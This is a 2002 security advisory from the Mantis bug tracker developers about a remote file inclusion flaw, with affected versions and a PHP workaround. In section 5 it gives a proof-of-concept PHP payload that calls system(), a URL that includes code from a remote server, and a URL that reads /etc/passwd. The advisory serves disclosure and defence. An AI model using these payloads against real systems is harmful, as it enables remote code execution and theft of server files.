[Mantis Advisory/2002-05] Arbitrary code execution and file reading vulnerability in Mantis

[Jeroen Latour <jlatour () calaquendi net>]

[Mantis Advisory/2002-05] Arbitrary code execution and file reading 
vulnerability in Mantis

  0. Table of Contents

    1. Introduction
    2. Summary / Impact analysis
    3. Affected versions
    4. Workaround / Solution
    5. Detailed explanation
      5.1 Arbitrary code execution
      5.2 Displaying local files
    6. Credit
    7. Contact details

  1. Introduction

Mantis is an Open Source web-based bugtracking system, written in PHP, 
which uses the MySQL database server. It is being actively developed by a 
small group of developers, and is considered to be in the beta stage.

  2. Summary / Impact analysis

Mantis allows the user to configure a file to be included at the top or 
bottom, a file which contains the CSS stylesheets and a file which contains 
meta tags. These files are set in default/config_inc2.php, and can be 
overridden in config_inc.php.

For some obscure reason, config_inc2.php only initialised the variables if 
it wasn't already set. This means that someone can set either 
$g_bottom_include_page, $g_top_include_page, $g_css_include_file or 
$g_meta_include_file using GET/POST parameters, or through a cookie.

Not all of these can be exploited to execute arbitrary code but all of them 
can be used to read any file on the server readable to the webserver user.

Mantis 0.17.4 removes the isset() checks from default/config_inc2.php and 
checks whether any of the four variables were set by a user. The latter 
checks are added to ensure that even when someone has used 
default/config_inc2.php to set configuration values, this vulnerability 
will still be closed.

Mantis installations which override all of the four previously mentioned 
variables in their config_inc.php are not affected.
Note that an account to the Mantis installation is not required to exploit 
this vulnerability, as login_page.php and core_html_API.php are vulnerable 
as well.

  3. Affected versions

The following versions are known to be affected:
  Mantis 0.17.3
  Mantis 0.17.2
  Mantis 0.17.1
  Mantis 0.17.0

The following versions are known to be unaffected:
  Mantis 0.17.4a
  Mantis 0.17.4
  Any version below Mantis 0.17.0 (*)

* = Except when the mentioned variables are not initialised anywhere, which 
shouldn't occur if a seperate config_ing.php file is used.

  4. Workaround / Solution

Mantis 0.17.4 removes the isset() checks, and some paranoia checks which 
prevent this vulnerability.
All users are recommended to upgrade to this version as soon as possible.

If an upgrade is not possible, the vulnerability can be closed by inserting 
the following lines in core_API.php:
  if ( isset($HTTP_GET_VARS['g_top_include_file']) ||
    isset($HTTP_POST_VARS['g_top_include_file']) ||
    isset($HTTP_COOKIE_VARS['g_top_include_file']) ) {
    exit;
  }

  if ( isset($HTTP_GET_VARS['g_bottom_include_page']) ||
    isset($HTTP_POST_VARS['g_bottom_include_page']) ||
    isset($HTTP_COOKIE_VARS['g_bottom_include_page']) ) {
    exit;
  }

  if ( isset($HTTP_GET_VARS['g_css_include_file']) ||
    isset($HTTP_POST_VARS['g_css_include_file']) ||
    isset($HTTP_COOKIE_VARS['g_css_include_file']) ) {
    exit;
  }

  if ( isset($HTTP_GET_VARS['g_meta_include_file']) ||
    isset($HTTP_POST_VARS['g_meta_include_file']) ||
    isset($HTTP_COOKIE_VARS['g_meta_include_file']) ) {
    exit;
  }

  5. Detailed explanation

    5.1 Arbitrary code execution

To execute arbitrary PHP code using this vulnerability, an attacker only 
has to store the PHP code (s)he wishes to execute in a textfile, make this 
available on a webserver accessible by the Mantis installation and point 
the $g_meta_include_file or the $g_css_include_file variable to that location.

For example, we create a file with the following content:
  <?php
    system('ls');
    exit;
  ?>

We make this file available on a webserver, for example at 
http://server.mynetwork.net/listings.txt
If the Mantis installation does not have access to the internet, the file 
should be stored on an internal server.

We then point our browser to 
http://mantis.server.com/mantis/login_page.php?g_meta_include_file=http://server.mynetwork.net/listings.txt
Any Mantis page that displays something will do. However, login_page.php 
does not require an account.

This will execute the following call:
  include('http://server.mynetwork.net/listings.txt&apos;);

This instructs PHP to download listings.txt and parse it as a PHP script. 
In this case, the browser should print a file listing of the current directory.

    5.2 Displaying local files

It is also possible to view any file available to the web user. The method 
is more or less the same, although in this case we do not let the server 
include a file we wrote, but just a local file we specify:

http://mantis.server.com/mantis/login_page.php?g_css_include_file=/etc/passwd

This will display the specified file if the webserver user has permission 
to read that file.

This vulnerability can be exploited using any of the 4 variables specified 
in section 2.

  6. Credit

This vulnerability was reported by Andrew Johnson and independently by the 
Debian Security Team.

  7. Contact details

The latest version of Mantis is always available from:
    http://mantisbt.sourceforge.net/
The current version is 0.17.4a, which can be downloaded from
    http://mantisbt.sourceforge.net/download.php3

If you have any questions about this vulnerability, or wish to report 
another, you can contact the developers at:
    mantisbt-security () lists sourceforge net
This is a private mailinglist, readable only by a few developers.

The latest version of this and other advisories can be found at:
    http://mantisbt.sourceforge.net/security.php3